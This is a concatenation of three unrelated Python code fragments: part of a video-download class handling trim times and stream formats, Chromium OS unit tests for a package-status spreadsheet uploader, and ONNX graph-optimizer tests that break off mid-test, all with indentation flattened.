duration = datetime.datetime.strptime('%s' %self.get_duration(), '%H:%M:%S').time()
# check if a start time has been defined
if self.start_time:
self.start_time_set = True
try:
self.start_time = datetime.datetime.strptime('%s' %self.start_time,
'%H:%M:%S').time()
except ValueError:
# catch an exception when the time does not match the pattern 'HH:MM:SS'
self.error_messages = ("The \'start time\' does not match the format \'HH:MM:SS\' for URL: \'%s\'."
%self.url)
return
# check that the start time is less than the duration
if self.start_time > duration:
self.error_messages = ("The start time must be less than the duration for URL: \'%s\'"
%self.url)
else:
self.start_time = datetime.datetime.strptime('00:00:00',
'%H:%M:%S').time()
# check if a end time has been defined
if self.end_time:
self.end_time_set = True
try:
self.end_time = datetime.datetime.strptime('%s' %self.end_time, '%H:%M:%S').time()
except ValueError:
self.error_messages = ("The \'end time\' does not match the format \'HH:MM:SS\' for URL: \'%s\'."
%self.url)
return
if self.end_time > duration:
self.error_messages = ("The end time must be less than the duration for URL: \'%s\'"
%self.url)
else:
self.end_time = duration
if self.start_time > self.end_time:
self.error_messages = ("The start time must be less than the end time for URL: \'%s\'"
%self.url)
return
self.duration = duration
def set_media_format(self):
# cycle through all streams available to check if the user defined file format is supported
for s in self.get_allstreamlist():
if s.extension == self.chosen_format and s.mediatype == "normal":
self.stream = self.get_bestnormal(self.chosen_format)
return
if s.extension == self.chosen_format and s.mediatype == "audio":
self.stream = self.get_bestaudio(self.chosen_format)
return
# if the chosen file format is not in the stream list, get the best quality stream of
# the same format type as a substitution for now
if self.format_type == 'av':
self.stream = self.get_bestnormal()
elif self.format_type == 'a':
self.stream = self.get_bestaudio()
# get the format of the stream generated
self.sub_format = self.stream.extension
def update_properties(self):
# update stream attributes to account for internal/environment changes
self.set_title()
self.set_file_path()
def is_convert_required(self):
# check if the video needs to be converted to the chosen_format
if self.sub_format:
return True
else:
return False
def is_start_time_set(self):
# check if user has defined the start_time
return self.start_time_set
def is_end_time_set(self):
# check if user has defined the end_time
return self.end_time_set
def is_trimmed(self):
# checks if the user has trimmed the times of the video
if self.start_time_set or self.end_time_set:
return True
else:
return False
def get_errors(self):
return self.error_messages
def get_stream(self):
# return stream object
return self.stream
def get_title(self):
# return video title
return self.title
def get_url(self):
# return youtube URL
return self.url
def get_start_time(self):
# returns user specified start time
return self.start_time
def get_end_time(self):
# returns user specified end time
return self.end_time
def get_chosen_format(self):
# return user chosen format
return self.chosen_format
def get_file_path(self):
# returns the designated file path
return self.file_path
def get_temp_file_path(self):
# returns the temporary file path for use with convertion and trimming
return self.temp_file_path
def get_duration(self):
# return video duration in its standard form
return self.vid.duration
def get_published(self):
# return video publish date
return self.vid.published
def get_allstreamlist(self):
# return all streams available
return self.vid.allstreams
def get_bestnormal(self, stream_format= "any"):
# return the best audio and video stream
return self.vid.getbest(preftype=stream_format)
def get_bestaudio(self, stream_format = "any"):
# return the best audio stream only
return self.vid.getbestaudio(preftype=stream_format)
|
|
#!/usr/bin/python
# Copyright (c) 2011 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unit tests for cros_portage_upgrade.py."""
import exceptions
import mox
from chromite.lib import cros_test_lib
from chromite.lib import gdata_lib
from chromite.lib import osutils
from chromite.lib import table as tablelib
from chromite.scripts import merge_package_status as mps
from chromite.scripts import upload_package_status as ups
# pylint: disable=W0212,R0904,E1120,E1101
class SSEntry(object):
"""Class to simulate one spreadsheet entry."""
def __init__(self, text):
self.text = text
class SSRow(object):
"""Class for simulating spreadsheet row."""
def __init__(self, row, cols=None):
self.custom = {}
if not cols:
# If columns not specified, then column order doesn't matter.
cols = row.keys()
for col in cols:
ss_col = gdata_lib.PrepColNameForSS(col)
val = row[col]
ss_val = gdata_lib.PrepValForSS(val)
self.custom[ss_col] = SSEntry(ss_val)
class SSFeed(object):
"""Class for simulating spreadsheet list feed."""
def __init__(self, rows, cols=None):
self.entry = []
for row in rows:
self.entry.append(SSRow(row, cols))
class UploaderTest(cros_test_lib.MoxOutputTestCase):
"""Test the functionality of upload_package_status.Uploader class."""
COL_PKG = 'Package'
COL_SLOT = 'Slot'
COL_OVERLAY = 'Overlay'
COL_STATUS = 'Status'
COL_VER = 'Current Version'
COL_STABLE_UP = 'Stable Upstream Version'
COL_LATEST_UP = 'Latest Upstream Version'
COL_TARGET = 'Chrome OS Root Target'
SS_COL_PKG = gdata_lib.PrepColNameForSS(COL_PKG)
SS_COL_SLOT = gdata_lib.PrepColNameForSS(COL_SLOT)
SS_COL_OVERLAY = gdata_lib.PrepColNameForSS(COL_OVERLAY)
SS_COL_STATUS = gdata_lib.PrepColNameForSS(COL_STATUS)
SS_COL_VER = gdata_lib.PrepColNameForSS(COL_VER)
SS_COL_STABLE_UP = gdata_lib.PrepColNameForSS(COL_STABLE_UP)
SS_COL_LATEST_UP = gdata_lib.PrepColNameForSS(COL_LATEST_UP)
SS_COL_TARGET = gdata_lib.PrepColNameForSS(COL_TARGET)
COLS = [COL_PKG,
COL_SLOT,
COL_OVERLAY,
COL_STATUS,
COL_VER,
COL_STABLE_UP,
COL_LATEST_UP,
COL_TARGET,
]
ROW0 = {COL_PKG: 'lib/foo',
COL_SLOT: '0',
COL_OVERLAY: 'portage',
COL_STATUS: 'needs upgrade',
COL_VER: '3.0.2',
COL_STABLE_UP: '3.0.9',
COL_LATEST_UP: '3.0.11',
COL_TARGET: 'chromeos',
}
ROW1 = {COL_PKG: 'sys-dev/bar',
COL_SLOT: '0',
COL_OVERLAY: 'chromiumos-overlay',
COL_STATUS: 'needs upgrade',
COL_VER: '1.2.3-r1',
COL_STABLE_UP: '1.2.3-r2',
COL_LATEST_UP: '1.2.4',
COL_TARGET: 'chromeos-dev',
}
ROW2 = {COL_PKG: 'sys-dev/raster',
COL_SLOT: '1',
COL_OVERLAY: 'chromiumos-overlay',
COL_STATUS: 'current',
COL_VER: '1.2.3',
COL_STABLE_UP: '1.2.3',
COL_LATEST_UP: '1.2.4',
COL_TARGET: 'chromeos-test',
}
SS_ROW0 = dict([(gdata_lib.PrepColNameForSS(c), v) for c, v in ROW0.items()])
SS_ROW1 = dict([(gdata_lib.PrepColNameForSS(c), v) for c, v in ROW1.items()])
SS_ROW2 = dict([(gdata_lib.PrepColNameForSS(c), v) for c, v in ROW2.items()])
EMAIL = '[email protected]'
PASSWORD = 'the'
def _MockUploader(self, table=None):
"""Set up a mocked Uploader object."""
uploader = self.mox.CreateMock(ups.Uploader)
if not table:
# Use default table
table = self._CreateDefaultTable()
for slot in ups.Uploader.__slots__:
uploader.__setattr__(slot, None)
uploader._csv_table = table
uploader._scomm = self.mox.CreateMock(gdata_lib.SpreadsheetComm)
uploader._creds = cros_test_lib.EasyAttr(user=self.EMAIL,
password=self.PASSWORD)
uploader._ss_row_cache = self._CreateRowCache(table)
return uploader
def _CreateRowCache(self, table):
"""Recreate the expected row cache (by pkg) from |table|."""
if not table:
return None
row_cache = {}
for rowIx, row in enumerate(table):
pkg = row[self.COL_PKG]
# Translate column names now.
ss_row_dict = {}
for col in row:
ss_row_dict[gdata_lib.PrepColNameForSS(col)] = row[col]
ss_row = gdata_lib.SpreadsheetRow('OrigRow%d' % (rowIx + 2),
rowIx + 2, ss_row_dict)
entry = row_cache.get(pkg)
if not entry:
row_cache[pkg] = ss_row
elif type(entry) == list:
row_cache[pkg] = entry + [ss_row]
else:
row_cache[pkg] = [entry, ss_row]
return row_cache
def _CreateDefaultTable(self):
return self._CreateTableWithRows(self.COLS,
[self.ROW0, self.ROW1])
def _CreateTableWithRows(self, cols, rows):
mytable = tablelib.Table(list(cols))
if rows:
for row in rows:
mytable.AppendRow(dict(row))
return mytable
def testLoadTable(self):
# Note that this test is not actually for method of Uploader class.
self.mox.StubOutWithMock(tablelib.Table, 'LoadFromCSV')
csv = 'any.csv'
# Replay script
tablelib.Table.LoadFromCSV(csv).AndReturn('loaded_table')
self.mox.ReplayAll()
# Verification steps.
with self.OutputCapturer():
loaded_table = ups.LoadTable(csv)
self.assertEquals(loaded_table, 'loaded_table')
def testGetSSRowForPackage(self):
mocked_uploader = self._MockUploader()
# No replay script.
self.mox.ReplayAll()
# Verification steps.
result = ups.Uploader._GetSSRowForPackage(mocked_uploader,
self.ROW0[self.COL_PKG])
self.assertEquals(result, self.SS_ROW0)
self.assertEquals(2, result.ss_row_num)
result = ups.Uploader._GetSSRowForPackage(mocked_uploader,
self.ROW1[self.COL_PKG])
self.assertEquals(result, self.SS_ROW1)
self.assertEquals(3, result.ss_row_num)
result = ups.Uploader._GetSSRowForPackage(mocked_uploader,
self.ROW2[self.COL_PKG])
self.assertEquals(result, None)
self.mox.VerifyAll()
def testUploadFirstWorksheet(self):
mocked_uploader = self._MockUploader()
# Clear ._scomm attribute to simulate uploading first worksheet.
mocked_scomm = mocked_uploader._scomm
mocked_uploader._scomm = None
self.mox.StubOutWithMock(gdata_lib.SpreadsheetComm, '__new__')
ss_key = 'Some ss_key'
ws_name = 'Some ws_name'
# Replay script
gdata_lib.SpreadsheetComm.__new__(gdata_lib.SpreadsheetComm
).AndReturn(mocked_scomm)
mocked_scomm.Connect(mocked_uploader._creds, ss_key, ws_name,
source='Upload Package Status')
mocked_scomm.GetRowCacheByCol(self.SS_COL_PKG).AndReturn('RowCache')
mocked_uploader._UploadChangedRows().AndReturn(tuple([0, 1, 2]))
mocked_uploader._DeleteOldRows().AndReturn(tuple([3, 4]))
self.mox.ReplayAll()
# Verify
with self.OutputCapturer():
ups.Uploader.Upload(mocked_uploader, ss_key, ws_name)
self.mox.VerifyAll()
def testUploadSecondWorksheet(self):
mocked_uploader = self._MockUploader()
ss_key = 'Some ss_key'
ws_name = 'Some ws_name'
# Replay script
mocked_uploader._scomm.SetCurrentWorksheet(ws_name)
mocked_uploader._scomm.GetRowCacheByCol(self.SS_COL_PKG).AndReturn('RCache')
mocked_uploader._UploadChangedRows().AndReturn(tuple([0, 1, 2]))
mocked_uploader._DeleteOldRows().AndReturn(tuple([3, 4]))
self.mox.ReplayAll()
# Verify
with self.OutputCapturer():
ups.Uploader.Upload(mocked_uploader, ss_key, ws_name)
self.mox.VerifyAll()
def testUploadChangedRows(self):
table = self._CreateTableWithRows(self.COLS,
[self.ROW0, self.ROW1, self.ROW2])
mocked_uploader = self._MockUploader(table=table)
def RowVerifier(row_delta, golden_col_set, golden_row):
if golden_col_set != set(row_delta.keys()):
return False
for col in row_delta:
val = row_delta[col]
if val != golden_row[col]:
return False
return True
# First Row.
# Pretend first row does not exist already in online spreadsheet
# by returning (None, None) from _GetSSRowForPackage.
#
row0_pkg = self.ROW0[self.COL_PKG]
mocked_uploader._GetSSRowForPackage(row0_pkg).AndReturn(None)
mocked_uploader._scomm.InsertRow(mox.IgnoreArg())
# Second Row.
# Pretend second row does already exist in online spreadsheet, and
# pretend that it has a different value that needs to be changed
# by an upload.
row1_pkg = self.ROW1[self.COL_PKG]
row1_reverse_delta = { self.SS_COL_VER: '1.2.3' }
ss_row1 = dict(self.SS_ROW1)
for col in row1_reverse_delta:
ss_row1[col] = row1_reverse_delta[col]
ss_row1 = gdata_lib.SpreadsheetRow('OrigRow1', 3, ss_row1)
mocked_uploader._GetSSRowForPackage(row1_pkg).AndReturn(ss_row1)
# Prepare verfication for row.
g_col_set1 = set(row1_reverse_delta.keys())
g_row1 = gdata_lib.PrepRowForSS(self.SS_ROW1)
row1_verifier = lambda rdelta : RowVerifier(rdelta, g_col_set1, g_row1)
mocked_uploader._scomm.UpdateRowCellByCell(3, mox.Func(row1_verifier))
# Third Row.
# Pretend third row does already exist in online spreadsheet, and
# pretend that several values need to be changed by an upload.
row2_pkg = self.ROW2[self.COL_PKG]
row2_reverse_delta = { self.SS_COL_STATUS: 'needs upgrade',
self.SS_COL_VER: '0.5',
self.SS_COL_TARGET: 'chromeos-foo',
}
ss_row2 = dict(self.SS_ROW2)
for col in row2_reverse_delta:
ss_row2[col] = row2_reverse_delta[col]
ss_row2 = gdata_lib.SpreadsheetRow('OrigRow2', 4, ss_row2)
mocked_uploader._GetSSRowForPackage(row2_pkg).AndReturn(ss_row2)
# Prepare verification for row.
g_col_set2 = set(row2_reverse_delta.keys())
g_row2 = gdata_lib.PrepRowForSS(self.SS_ROW2)
row2_verifier = lambda rdelta : RowVerifier(rdelta, g_col_set2, g_row2)
mocked_uploader._scomm.UpdateRowCellByCell(4, mox.Func(row2_verifier))
self.mox.ReplayAll()
# Verify
with self.OutputCapturer():
ups.Uploader._UploadChangedRows(mocked_uploader)
self.mox.VerifyAll()
def testDeleteOldRows(self):
mocked_uploader = self._MockUploader()
# Pretend spreadsheet has 2 rows, one in table and one not.
ss_row1 = gdata_lib.SpreadsheetRow('OrigRow1', 2, self.SS_ROW1)
ss_row2 = gdata_lib.SpreadsheetRow('OrigRow2', 3, self.SS_ROW2)
ss_rows = (ss_row1, ss_row2)
mocked_uploader._scomm.GetRows().AndReturn(ss_rows)
# We expect ROW2 in spreadsheet to be deleted.
mocked_uploader._scomm.DeleteRow('OrigRow2')
self.mox.ReplayAll()
# Verify
with self.OutputCapturer():
ups.Uploader._DeleteOldRows(mocked_uploader)
self.mox.VerifyAll()
class MainTest(cros_test_lib.MoxOutputTestCase):
"""Test argument handling at the main method level."""
def testHelp(self):
"""Test that --help is functioning"""
with self.OutputCapturer() as output:
# Running with --help should exit with code==0
try:
ups.main(['--help'])
except exceptions.SystemExit, e:
self.assertEquals(e.args[0], 0)
# Verify that a message beginning with "Usage: " was printed
stdout = output.GetStdout()
self.assertTrue(stdout.startswith('Usage: '))
def testMissingCSV(self):
"""Test that running without a csv file argument exits with an error."""
with self.OutputCapturer():
# Running without a package should exit with code!=0
try:
ups.main([])
except exceptions.SystemExit, e:
self.assertNotEquals(e.args[0], 0)
self.AssertOutputEndsInError(check_stdout=True)
def testPrepareCredsEmailPassword(self):
email = '[email protected]'
password = 'shh'
creds_file = 'bogus'
token_file = 'boguser'
mocked_creds = self.mox.CreateMock(gdata_lib.Creds)
self.mox.StubOutWithMock(gdata_lib.Creds, '__new__')
gdata_lib.Creds.__new__(gdata_lib.Creds).AndReturn(mocked_creds)
mocked_creds.SetCreds(email, password)
self.mox.ReplayAll()
ups.PrepareCreds(creds_file, token_file, email, password)
self.mox.VerifyAll()
def testMainEmailPassword(self):
"""Verify that running main with email/password follows flow."""
csv = 'any.csv'
email = '[email protected]'
password = '123'
mocked_creds = self.mox.CreateMock(gdata_lib.Creds)
creds_file = 'non-existing-file'
self.mox.StubOutWithMock(ups, 'PrepareCreds')
self.mox.StubOutWithMock(ups, 'LoadTable')
self.mox.StubOutWithMock(mps, 'FinalizeTable')
self.mox.StubOutWithMock(ups.Uploader, 'Upload')
ups.PrepareCreds(creds_file, None, email, password).AndReturn(mocked_creds)
ups.LoadTable(csv).AndReturn('csv_table')
mps.FinalizeTable('csv_table')
ups.Uploader.Upload(mox.IgnoreArg(), ws_name='Packages')
ups.Uploader.Upload(mox.IgnoreArg(), ws_name='Dependencies')
mocked_creds.StoreCredsIfNeeded(creds_file)
self.mox.ReplayAll()
ups.main(['--email=%s' % email,
'--password=%s' % password,
'--cred-file=%s' % creds_file,
csv])
self.mox.VerifyAll()
@osutils.TempFileDecorator
def testMainCredsFile(self):
"""Verify that running main with creds file follows flow."""
csv = 'any.csv'
creds_file = self.tempfile
token_file = 'non-existing-file'
mocked_creds = self.mox.CreateMock(gdata_lib.Creds)
mocked_creds.auth_token_loaded = False
self.mox.StubOutWithMock(ups, 'PrepareCreds')
self.mox.StubOutWithMock(ups, 'LoadTable')
self.mox.StubOutWithMock(mps, 'FinalizeTable')
self.mox.StubOutWithMock(ups.Uploader, 'Upload')
ups.PrepareCreds(creds_file, token_file, None, None).AndReturn(mocked_creds)
ups.LoadTable(csv).AndReturn('csv_table')
mps.FinalizeTable('csv_table')
ups.Uploader.Upload(mox.IgnoreArg(), ws_name=ups.PKGS_WS_NAME)
ups.Uploader.Upload(mox.IgnoreArg(), ws_name=ups.DEPS_WS_NAME)
mocked_creds.StoreCredsIfNeeded(creds_file)
mocked_creds.StoreAuthTokenIfNeeded(token_file)
self.mox.ReplayAll()
ups.main(['--cred-file=%s' % creds_file,
'--auth-token-file=%s' % token_file,
csv])
self.mox.VerifyAll()
@osutils.TempFileDecorator
def testMainTokenFile(self):
"""Verify that running main with token file follows flow."""
csv = 'any.csv'
token_file = self.tempfile
creds_file = 'non-existing-file'
mocked_creds = self.mox.CreateMock(gdata_lib.Creds)
mocked_creds.auth_token_loaded = True
self.mox.StubOutWithMock(ups, 'PrepareCreds')
self.mox.StubOutWithMock(ups, 'LoadTable')
self.mox.StubOutWithMock(mps, 'FinalizeTable')
self.mox.StubOutWithMock(ups.Uploader, 'Upload')
ups.PrepareCreds(creds_file, token_file, None, None).AndReturn(mocked_creds)
ups.LoadTable(csv).AndReturn('csv_table')
mps.FinalizeTable('csv_table')
ups.Uploader.Upload(mox.IgnoreArg(), ws_name=ups.PKGS_WS_NAME)
ups.Uploader.Upload(mox.IgnoreArg(), ws_name=ups.DEPS_WS_NAME)
mocked_creds.StoreCredsIfNeeded(creds_file)
mocked_creds.StoreAuthTokenIfNeeded(token_file)
self.mox.ReplayAll()
ups.main(['--cred-file=%s' % creds_file,
'--auth-token-file=%s' % token_file,
csv])
self.mox.VerifyAll()
if __name__ == '__main__':
cros_test_lib.main()
|
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from onnx import checker, helper, ModelProto, TensorProto, GraphProto, NodeProto
from typing import Sequence, Text, Tuple, List, Callable
from onnx import numpy_helper
import numpy as np # type: ignore
import onnx.optimizer
import unittest
class TestOptimizer(unittest.TestCase):
def _optimized(self, graph, opts): # type: (GraphProto, Sequence[Text]) -> ModelProto
orig_model = helper.make_model(graph, producer_name='onnx-test')
optimized_model = onnx.optimizer.optimize(orig_model, opts)
checker.check_model(optimized_model)
return optimized_model
# input_types and output_types are lists of triples of (name, type, shape)
def _make_fake_loop_op(self,
body_nodes, # type: Sequence[NodeProto]
input_types, # type: Sequence[Tuple[TensorProto.DataType, Sequence[int], Text]]
output_types # type: Sequence[Tuple[TensorProto.DataType, Sequence[int], Text]]
): # type: (...) -> List[NodeProto]
zero = helper.make_tensor("trip_count_value", TensorProto.INT32, (), [10])
true = helper.make_tensor("condition", TensorProto.BOOL, (), [True])
# lcd is a dummy loop-carried dependency that only exists because
# right now the schema checker is broken and assumes a variadic
# input needs at least one value.
graph_inputs = [helper.make_tensor_value_info("i", TensorProto.INT32, ()),
helper.make_tensor_value_info("cond", TensorProto.BOOL, ())]
for type, shape, name in input_types:
graph_inputs.append(helper.make_tensor_value_info("_" + name, type, shape))
graph_outputs = [helper.make_tensor_value_info("cond", TensorProto.BOOL, ())]
for type, shape, name in output_types:
graph_outputs.append(helper.make_tensor_value_info("_" + name, type, shape))
body_graph = helper.make_graph(body_nodes, "body_graph", graph_inputs,
graph_outputs)
loop_inputs = ["trip_count", "condition"]
loop_inputs.extend([name for _, _, name in input_types])
# TODO: fix checker to accept 0-input variadic inputs
if len(loop_inputs) == 2:
loop_inputs.append("")
loop_outputs = [name for _, _, name in output_types]
retval_nodes = [
helper.make_node("Constant", [], ["trip_count"], value=zero),
helper.make_node("Constant", [], ["condition"], value=true),
helper.make_node("Loop", loop_inputs, loop_outputs, body=body_graph)
]
return retval_nodes
def _make_fake_if_op(self,
true_nodes, # type: Sequence[NodeProto]
false_nodes, # type: Sequence[NodeProto]
output_types # type: Sequence[Tuple[TensorProto.DataType, Sequence[int], Text]]
): # type: (...) -> List[NodeProto]
true = helper.make_tensor("condition", TensorProto.BOOL, (), [True])
true_graph = helper.make_graph(true_nodes, "true_graph", [], [])
false_graph = helper.make_graph(false_nodes, "false_graph", [], [])
if_inputs = ["condition"]
if_outputs = [name for _, _, name in output_types]
retval_nodes = [
helper.make_node("Constant", [], ["condition"], value=true),
helper.make_node("If", if_inputs, if_outputs, then_branch=true_graph,
else_branch=false_graph)
]
return retval_nodes
# fn is a function that takes a single node as argument
def _visit_all_nodes_recursive(self, graph, fn): # type: (GraphProto, Callable[[NodeProto], None]) -> None
for node in graph.node:
fn(node)
for attr in node.attribute:
if attr.g is not None:
self._visit_all_nodes_recursive(attr.g, fn)
if len(attr.graphs):
for gr in attr.graphs:
self._visit_all_nodes_recursive(gr, fn)
def test_get_available_passes(self): # type: () -> None
# FIXME does not garantees to be listing all
graph = helper.make_graph([], "dummy_graph", [], [])
list_of_passes = onnx.optimizer.get_available_passes()
assert isinstance(list_of_passes, (list)) and len(list_of_passes) > 0
for pass_name in list_of_passes:
# If pass_name is invalid it throws a RuntimeError
self._optimized(graph, [pass_name])
def test_eliminate_identity_single_use(self): # type: () -> None
nodes = [helper.make_node("Identity", ["X"], ["Y"])]
nodes.extend(self._make_fake_loop_op(
[helper.make_node("Identity", ["_Y"], ["_Y2"])],
[(TensorProto.FLOAT, (5,), "Y")],
[(TensorProto.FLOAT, (5,), "Y2")]))
graph = helper.make_graph(
nodes,
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (5,))],
[helper.make_tensor_value_info("Y", TensorProto.FLOAT, (5,)),
helper.make_tensor_value_info("Y2", TensorProto.FLOAT, (5,))])
optimized_model = self._optimized(graph, ["eliminate_identity"])
# All identity nodes should have been eliminated
def check_identity(node): # type: (NodeProto) -> None
assert node.op_type != "Identity"
self._visit_all_nodes_recursive(optimized_model.graph, check_identity)
# Use of the output from the Identity node in the main graph should
# have been replaced with the input to the identity node
assert len(optimized_model.graph.output) == 2
assert optimized_model.graph.output[0].name == "X"
# Use of the output from the Identity node in the loop graph should
# have been replaced with the input to that identity node
assert len(optimized_model.graph.node[2].attribute[0].g.output) == 2
assert optimized_model.graph.node[2].attribute[0].g.output[1].name == "_Y"
def test_eliminate_identity_multiple_uses(self): # type: () -> None
identity = helper.make_node("Identity", ["X"], ["Y"])
add = helper.make_node("Add", ["Z", "Y"], ["A"])
mul = helper.make_node("Mul", ["A", "Y"], ["B"])
graph = helper.make_graph(
[identity, add, mul],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (5,)),
helper.make_tensor_value_info("Z", TensorProto.FLOAT, (5,))],
[helper.make_tensor_value_info("B", TensorProto.FLOAT, (5,))])
optimized_model = self._optimized(graph, ["eliminate_identity"])
for node in optimized_model.graph.node:
assert node.op_type != "Identity"
assert len(optimized_model.graph.node) == 2
def test_nop_transpose(self): # type: () -> None
nodes = [helper.make_node("Transpose", ["X"], ["Y"], perm=[0, 1])]
nodes.extend(self._make_fake_loop_op(
[helper.make_node("Transpose", ["_Y"], ["_Y2"], perm=[0, 1])],
[(TensorProto.FLOAT, (2, 3), "Y")],
[(TensorProto.FLOAT, (2, 3), "Y2")]))
graph = helper.make_graph(
nodes,
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (2, 3))],
[helper.make_tensor_value_info("Y", TensorProto.FLOAT, (2, 3)),
helper.make_tensor_value_info("Y2", TensorProto.FLOAT, (2, 3))])
optimized_model = self._optimized(graph, ["eliminate_nop_transpose"])
def check_transpose(node): # type: (NodeProto) -> None
assert node.op_type != "Transpose"
self._visit_all_nodes_recursive(optimized_model.graph, check_transpose)
# Use of the output from the Transpose node in the main graph should
# have been replaced with the input to the identity node
assert len(optimized_model.graph.output) == 2
assert optimized_model.graph.output[0].name == "X"
# Use of the output from the Transpose node in the loop graph should
# have been replaced with the input to that identity node
assert len(optimized_model.graph.node[2].attribute[0].g.output) == 2
assert optimized_model.graph.node[2].attribute[0].g.output[1].name == "_Y"
def test_nop_transpose_default(self): # type: () -> None
trans = helper.make_node("Transpose", ["X"], ["Y"])
graph = helper.make_graph(
[trans],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (2, 3))],
[helper.make_tensor_value_info("Y", TensorProto.FLOAT, (3, 2))])
optimized_model = self._optimized(graph, ["eliminate_nop_transpose"])
assert len(list(optimized_model.graph.node)) == 1
assert optimized_model.graph.node[0].op_type == "Transpose"
def test_eliminate_unused_initializer(self): # type: () -> None
add = helper.make_node("Add", ["X", "Y"], ["Z"])
graph = helper.make_graph(
[add],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 2)),
helper.make_tensor_value_info("Y", TensorProto.FLOAT, (1, 2))],
[helper.make_tensor_value_info("Z", TensorProto.FLOAT, (1, 2))],
[helper.make_tensor("A", TensorProto.FLOAT,
dims=(2, 3),
vals=np.random.randn(2, 3).astype(np.float32).tobytes(),
raw=True)])
optimized_model = self._optimized(graph, ["eliminate_unused_initializer"])
assert len(list(optimized_model.graph.initializer)) == 0
def test_eliminate_unused_initializer_input(self): # type: () -> None
add = helper.make_node("Add", ["X", "Y"], ["Z"])
graph = helper.make_graph(
[add],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 2)),
helper.make_tensor_value_info("Y", TensorProto.FLOAT, (1, 2)),
helper.make_tensor_value_info("A", TensorProto.FLOAT, (2, 3))],
[helper.make_tensor_value_info("Z", TensorProto.FLOAT, (1, 2))],
[helper.make_tensor("A", TensorProto.FLOAT,
dims=(2, 3),
vals=np.random.randn(2, 3).astype(np.float32).tobytes(),
raw=True)])
optimized_model = self._optimized(graph, ["eliminate_unused_initializer"])
assert len(list(optimized_model.graph.initializer)) == 0
assert len(optimized_model.graph.input) == 2
def test_eliminate_unused_initializer_no_eliminate_used_default(self): # type: () -> None
add = helper.make_node("Add", ["X", "A"], ["Z"])
graph = helper.make_graph(
[add],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 2)),
helper.make_tensor_value_info("A", TensorProto.FLOAT, (1, 2))],
[helper.make_tensor_value_info("Z", TensorProto.FLOAT, (1, 2))],
[helper.make_tensor("A", TensorProto.FLOAT,
dims=(1, 2),
vals=np.random.randn(1, 2).astype(np.float32).tobytes(),
raw=True)])
optimized_model = self._optimized(graph, ["eliminate_unused_initializer"])
assert len(list(optimized_model.graph.initializer)) == 1
def test_eliminate_unused_initializer_no_eliminate_used(self): # type: () -> None
nodes = [helper.make_node("Add", ["X", "A"], ["Z"])]
nodes.extend(self._make_fake_loop_op(
[helper.make_node("Add", ["_X", "_A"], ["_Z2"])],
[(TensorProto.FLOAT, (1, 2), "X"),
(TensorProto.FLOAT, (1, 2), "A")],
[(TensorProto.FLOAT, (1, 2), "Z2")]))
graph = helper.make_graph(
nodes,
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 2)),
helper.make_tensor_value_info("A", TensorProto.FLOAT, (1, 2))],
[helper.make_tensor_value_info("Z", TensorProto.FLOAT, (1, 2))],
[helper.make_tensor("A", TensorProto.FLOAT,
dims=(1, 2),
vals=np.random.randn(1, 2).astype(np.float32).tobytes(),
raw=True)])
optimized_model = self._optimized(graph, ["eliminate_unused_initializer"])
# Add, Constant (trip count), Constant (cond), Loop
assert len(list(optimized_model.graph.node)) == 4
assert optimized_model.graph.node[0].op_type == "Add"
assert optimized_model.graph.output[0].name == "Z"
# Add
assert len(optimized_model.graph.node[3].attribute[0].g.node) == 1
assert optimized_model.graph.node[3].attribute[0].g.node[0].op_type == 'Add'
assert optimized_model.graph.node[3].attribute[0].g.output[1].name == '_Z2'
assert len(list(optimized_model.graph.initializer)) == 1
def test_eliminate_unused_initializer_no_eliminate_output(self): # type: () -> None
add = helper.make_node("Add", ["X", "Y"], ["Z"])
graph = helper.make_graph(
[add],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 2)),
helper.make_tensor_value_info("Y", TensorProto.FLOAT, (1, 2)),
helper.make_tensor_value_info("A", TensorProto.FLOAT, (2, 3))],
[helper.make_tensor_value_info("Z", TensorProto.FLOAT, (1, 2)),
helper.make_tensor_value_info("A", TensorProto.FLOAT, (2, 3))],
[helper.make_tensor("A", TensorProto.FLOAT,
dims=(2, 3),
vals=np.random.randn(2, 3).astype(np.float32).tobytes(),
raw=True)])
optimized_model = self._optimized(graph, ["eliminate_unused_initializer"])
assert len(list(optimized_model.graph.initializer)) == 1
assert "Z" in [o.name for o in optimized_model.graph.output]
def test_extract_constant_to_initializer(self): # type: () -> None
conv = helper.make_node("Conv", ["X", "Y"], ["Z"])
constant = helper.make_node("Constant", [], ["A"],
value=helper.make_tensor(
name="bias",
data_type=TensorProto.FLOAT,
dims=(16, 1, 1),
vals=np.random.randn(16).astype(np.float32).tolist()))
add = helper.make_node("Add", ["Z", "A"], ["B"])
graph = helper.make_graph(
[conv, constant, add],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 5, 3, 3)),
helper.make_tensor_value_info("Y", TensorProto.FLOAT, (16, 5, 3, 3))],
[helper.make_tensor_value_info("B", TensorProto.FLOAT, (1, 16, 1, 1))],
)
optimized_model = self._optimized(graph, ["extract_constant_to_initializer"])
self.assertEqual(
set(vi.name for vi in optimized_model.graph.input),
{'X', 'Y', 'A'})
self.assertEqual(len(optimized_model.graph.initializer), 1)
init = optimized_model.graph.initializer[0]
self.assertEqual(init.name, 'A')
self.assertEqual(init.dims, [16, 1, 1])
self.assertEqual(init.data_type, TensorProto.FLOAT)
self.assertEqual([n.op_type for n in optimized_model.graph.node], ['Conv', 'Add'])
def test_fuse_transpose(self): # type: () -> None
nodes = [helper.make_node("Transpose", ["X"], ["Y"], perm=[1, 0, 2]),
helper.make_node("Transpose", ["Y"], ["Z"], perm=[2, 0, 1]),
helper.make_node("Transpose", ["Z"], ["A"], perm=[2, 0, 1])]
nodes.extend(self._make_fake_loop_op(
[helper.make_node("Transpose", ["_X"], ["_Y2"], perm=[1, 0, 2]),
helper.make_node("Transpose", ["_Y2"], ["_Y3"], perm=[2, 0, 1]),
helper.make_node("Transpose", ["_Y3"], ["_Y4"], perm=[2, 0, 1])],
[(TensorProto.FLOAT, (2, 3), "X")],
